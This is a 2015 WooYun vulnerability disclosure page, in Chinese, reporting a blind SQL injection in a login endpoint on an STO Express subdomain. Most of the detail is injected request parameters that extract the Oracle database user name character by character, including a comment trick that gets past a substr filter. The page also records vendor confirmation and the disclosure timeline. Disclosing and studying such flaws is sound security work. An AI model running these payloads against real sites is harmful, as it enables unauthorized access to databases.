当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:
wooyun-2015-0150482
漏洞标题:
申通快递某分站存在SQL注入漏洞
相关厂商:
申通快递
漏洞作者:
路人甲
提交时间:
2015-10-30 09:43
修复时间:
2015-12-15 15:46
公开时间:
2015-12-15 15:46
漏洞类型:
SQL注射漏洞
危害等级:
自评Rank:
10
漏洞状态:
厂商已经确认
漏洞来源:
http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签:
分享漏洞:
4人收藏 收藏
分享漏洞:
>

漏洞详情

披露状态:

2015-10-30: 细节已通知厂商并且等待厂商处理中
2015-10-31: 厂商已经确认,细节仅向厂商公开
2015-11-10: 细节向核心白帽子及相关领域专家公开
2015-11-20: 细节向普通白帽子公开
2015-11-30: 细节向实习白帽子公开
2015-12-15: 细节向公众公开

简要描述:

详细说明:

http://cos.sto.cn
注入点http://cos.sto.cn/login/LoginOperation.jsp?method=checkTokenKey&loginid=a
loginid处存在注入
可以通过等待响应时间的长短来判断
当等待响应时间大于200ms时 表示正确
否则表示错误
请求

method=checkTokenKey&loginid=a' or 1=1 and 'a'='a


选区_315.png


请求

method=checkTokenKey&loginid=a' or 1=2 and 'a'='a


选区_316.png


请求

method=checkTokenKey&loginid=a' or 1=1  and length('aa') = 2   and 'a'='a


选区_317.png


请求

method=checkTokenKey&loginid=a' or 1=1  and length('aa') = 1   and 'a'='a


选区_318.png


查看当前用户的长度

选区_319.png


选区_331.png


选区_332.png


method=checkTokenKey&loginid=a' or 1=1  and length(SYS_CONTEXT('USERENV','CURRENT_USER')) =7  and 'a'='a


由此可知当前用户长度为7
然后查看用户
当使用substr时

method=checkTokenKey&loginid=a' or 1=1  and substr('aa',1,1)='a'  and 'a'='a


选区_336.png


显示系统错误
当在substr后加上/**/时可以绕过

method=checkTokenKey&loginid=a' or 1=1  and substr/**/('aa',1,1)='a'  and 'a'='a


选区_333.png


首先看第一位

method=checkTokenKey&loginid=a' or 1=1  and ascii(substr/**/(SYS_CONTEXT('USERENV','CURRENT_USER'),1,1)) >50 and 'a'='a


选区_334.png


method=checkTokenKey&loginid=a' or 1=1  and ascii(substr/**/(SYS_CONTEXT('USERENV','CURRENT_USER'),1,1)) >70 and 'a'='a


选区_335.png


method=checkTokenKey&loginid=a' or 1=1  and ascii(substr/**/(SYS_CONTEXT('USERENV','CURRENT_USER'),1,1)) =69 and 'a'='a


选区_337.png


可知第一位对应的ascii为69

method=checkTokenKey&loginid=a' or 1=1  and ascii(substr/**/(SYS_CONTEXT('USERENV','CURRENT_USER'),2,1)) =67 and 'a'='a


选区_341.png


第二位对应的ascii为67

method=checkTokenKey&loginid=a' or 1=1  and ascii(substr/**/(SYS_CONTEXT('USERENV','CURRENT_USER'),3,1)) =79 and 'a'='a


选区_338.png


第三位对应的ascii为79
以此类推
第四位 76
第五位 79
第六位 71
第七位 89
则对应的用户为ECOLOGY
WooYun: 申通快递某分站存在SQL注入漏洞 中得到的一致
可以验证一下

method=checkTokenKey&loginid=a' or 1=1  and SYS_CONTEXT('USERENV','CURRENT_USER')='ECOLOGY' and 'a'='a


选区_339.png


漏洞证明:

method=checkTokenKey&loginid=a' or 1=1  and ascii(substr/**/(SYS_CONTEXT('USERENV','CURRENT_USER'),1,1)) =69 and 'a'='a


选区_337.png


可知第一位对应的ascii为69

method=checkTokenKey&loginid=a' or 1=1  and ascii(substr/**/(SYS_CONTEXT('USERENV','CURRENT_USER'),2,1)) =67 and 'a'='a


选区_341.png


第二位对应的ascii为67

method=checkTokenKey&loginid=a' or 1=1  and ascii(substr/**/(SYS_CONTEXT('USERENV','CURRENT_USER'),3,1)) =79 and 'a'='a


选区_338.png


第三位对应的ascii为79
以此类推
第四位 76
第五位 79
第六位 71
第七位 89
则对应的用户为ECOLOGY
WooYun: 申通快递某分站存在SQL注入漏洞 中得到的一致
可以验证一下

method=checkTokenKey&loginid=a' or 1=1  and SYS_CONTEXT('USERENV','CURRENT_USER')='ECOLOGY' and 'a'='a


选区_339.png


修复方案:

版权声明:转载请注明来源 路人甲@乌云

>

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-10-31 15:45

厂商回复:

谢谢

最新状态:

暂无